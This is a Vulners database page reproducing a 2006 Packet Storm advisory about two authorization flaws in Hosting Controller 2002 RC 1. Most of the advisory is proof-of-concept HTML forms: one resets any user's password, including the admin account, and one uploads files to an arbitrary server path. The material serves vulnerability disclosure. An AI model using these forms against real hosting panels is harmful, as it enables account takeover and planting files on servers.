Lucene search
K

HostingController.txt

🗓️ 04 Apr 2006 00:00:00Reported by Paolo Di FebboType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

2 vulnerabilities in Hosting Controller allowing remote users to change passwords and upload files

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Hello,  
i've found 2 vulnerabilities in Hosting Controller that allows remote  
authenticated users to change every user password or upload files in every  
directory. Here are the PoC:  
  
This allows to modify passwords:  
<form  
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser  
"  
method="post">  
Username: <input name="UserName" value="hcadmin"  
type="text" size="50">  
<br>  
Name: <input name="FullName" value="g|25|h"  
type="text" size="50">  
<br>  
ChangePass (type true): <input type="checkbox" name="PassCheck"  
value="TRUE">  
<br>  
Password: <input name="Pass1" title="Password">  
<br>  
Confirm: <input name="ConfPass" title="Password">  
<br>  
<input name="submit" value="submit" type="submit">  
  
</form>  
<br>  
PS: You should have authenticated access.<br>  
<br>  
- -------------------------<br>  
Vulnerable versions:<br>  
- - HC 2002 RC 1<br>  
Other versions may be vulnerable  
  
  
And this allows to upload:  
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"  
enctype="multipart/form-data">  
Where upload files: <input name="OpenPath" value="E:\webspace\test">  
<br>  
File 1: <input type="file" name="file1" value><br>  
File 2: <input type="file" name="file2" value><br>  
File 3: <input type="file" name="file3" value><br>  
File 4: <input type="file" name="file4" value><br>  
<input type="submit" value="Upload Files" name="upload"><br>  
<br><br>  
PS: If you see an error message, it's not important. You just should have  
authenticated access.  
</form>  
<br>  
  
- -------------------------<br>  
Vulnerable versions:<br>  
- - HC 2002 RC 1<br>  
Other versions may be vulnerable  
  
This vulns are tested with HC 2002 RC 1, but other versions may be  
vulnerable.  
  
  
Sorry for my english, but i'm Italian.  
  
-----BEGIN PGP SIGNATURE-----  
Version: 6.5.8ckt http://www.ipgpp.com/  
  
iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh  
KUkiwb7H3FkEdfZcORRpl4LH  
=qlwF  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation